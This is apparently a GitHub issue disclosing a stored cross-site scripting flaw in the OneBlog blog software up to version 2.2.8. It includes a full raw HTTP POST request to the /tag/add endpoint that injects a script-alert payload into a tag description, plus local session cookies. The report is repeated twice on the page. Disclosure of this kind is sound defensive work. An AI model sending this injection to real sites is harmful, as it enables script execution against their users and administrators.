Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via Access the add function in the operation tab list in the background, and then inject
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base] OneBlog- <=2.2.8
[Affected Component] POST /tag/add HTTP/1.1 Host: localhost:8085 Content-Length: 70 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" Accept: / X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:8085 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8085/article/tags Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00 Connection: close
id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E [Attack Type] Remote
[Impact Code execution] true
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Cross SIte Scripting (XSS) vulnerability exists in OneBlog- <=2.2.8. via
<script>alert("xss")</script>codeAccess the add function in the operation tab list in the background, and then inject
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base]
OneBlog- <=2.2.8
[Affected Component]
POST /tag/add HTTP/1.1
Host: localhost:8085
Content-Length: 70
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8085
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8085/article/tags
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=f0757d8a-afb9-403a-b1f2-5d7c3e3a9d00
Connection: close
id=&name=Redis&description=%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote
[Impact Code execution]

true
The text was updated successfully, but these errors were encountered: